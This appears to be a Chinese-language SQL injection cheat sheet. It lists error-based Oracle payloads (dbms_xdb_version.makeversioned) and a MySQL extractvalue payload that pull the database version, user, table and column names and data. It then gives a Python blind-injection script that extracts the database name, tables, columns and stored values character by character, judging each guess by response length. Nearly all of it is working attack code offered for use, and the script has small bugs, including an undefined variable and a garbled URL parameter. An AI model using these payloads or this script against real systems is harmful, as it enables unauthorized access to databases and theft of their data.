報錯注入:
oracle payload:
獲取數據庫版本
a' or (select dbms_xdb_version.makeversioned((select banner from sys.v_$version where rownum like 1)) from dual) like 'a
獲取用戶名
a' or (select dbms_xdb_version.makeversioned((select user from dual)) from dual) like 'a
獲取表名
a' or (select dbms_xdb_version.makeversioned((select table_name from all_tables where rownum like 1)) from dual) like 'a
獲取下一個表名
a' or (select dbms_xdb_version.makeversioned((select table_name from all_tables where rownum like 1 and table_name not like 'DUAL')) from dual) like 'a
獲取表中的列名
a' or (select dbms_xdb_version.makeversioned((select column_name from all_tab_columns where table_name like 'SYSTEM_PRIVILEGE_MAP' and rownum like 1)) from dual) like 'a
獲取下一個列名
a' or (select dbms_xdb_version.makeversioned((select column_name from all_tab_columns where table_name like 'SYSTEM_PRIVILEGE_MAP' and rownum like 1 and column_name not like 'PRIVILEGE')) from dual) like 'a
獲取數據
a' or (select dbms_xdb_version.makeversioned((select name from SYSTEM_PRIVILEGE_MAP where rownum like 1)) from dual) like 'a
Mysql payload:
extractvalue(rand(),+concat(0x3a,substring(version(),1,30)))
盲注:
import requests
url1 = "https://www.test.com/search/index/?param1=1+or+"
url2 = "--+¶m2=aaa¶m3=1"
# 盲注獲取數據長度
def getlength(payload):
length = 0
url = url1 + payload + str(length) + url2
#print url
r = requests.get(url)
while(len(r.content) < 70000): #這裏判斷根據返回數據長度來區分
length = length + 1
payload_tmp = payload + str(length)
url = url1 + payload_tmp + url2
r = requests.get(url)
print length
return length
#盲注對字段每個字符逐一爆破
def getstr(payload):
i = 0
#all_str = "_abcdefghijklmnopqrstuvwxyz"
all_str = "_.-@%$#!<>'?abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
like_str = "='" + all_str[i] + "'"
url = url1 + payload + like_str + url2
r = requests.get(url)
while(len(r.content) < 70000):
i = i + 1
like_str = "='" + all_str[i] + "'"
url = url1 + payload + like_str + url2
#print url
r = requests.get(url)
print all_str[i]
return all_str[i]
#數據庫字段
database_length = getlength("length(database())=")
database_str = ""
for i in range(1, database_length + 1):
payload = "(substr(database()," + str(i) + ",1))"
database_str += getstr(payload)
#數據庫表字段
table_count = getlength("(select+count(*)+from+information_schema.tables+where+table_schema='database')=")
table_name_str = ""
for i in range(1, table_name_len + 1):
payload = "(substr((select+table_name+from+information_schema.columns+where+table_schema='database'+and+column_name='password'+limit+0,1)," + str(i) + ",1))"
table_name_str += getstr(payload)
#表中列字段
colume_count = getlength("(SELECT+COUNT(*)+FROM+information_schema.COLUMNS+WHERE+TABLE_SCHEMA='database'+AND+TABLE_NAME='table')=")
for i in range(0, colume_count):
column_name_length = getlength("length((select+column_name+from+information_schema.columns+where+table_schema='database'+and+table_name='table'+limit+"+str(i)+",1))=")
columu_name_str = ""
for j in range(1, column_name_length + 1):
payload = "(substr((select+column_name+from+information_schema.columns+where+table_schema='database'+and+table_name='table'+limit+"+str(i)+",1)," + str(j) + ",1))"
columu_name_str += getstr(payload)
print columu_name_str
#獲取數據
data = ""
data_len = getlength("length((select+val+from+table+order+by+create_time+desc+limit+0,1))=")
print data_len
for i in range(1, data_len + 1):
payload = "(substr((select+val+from+table+order+by+create_time+desc+limit+0,1)," + str(i) + ",1))"
data += getstr(payload)
print data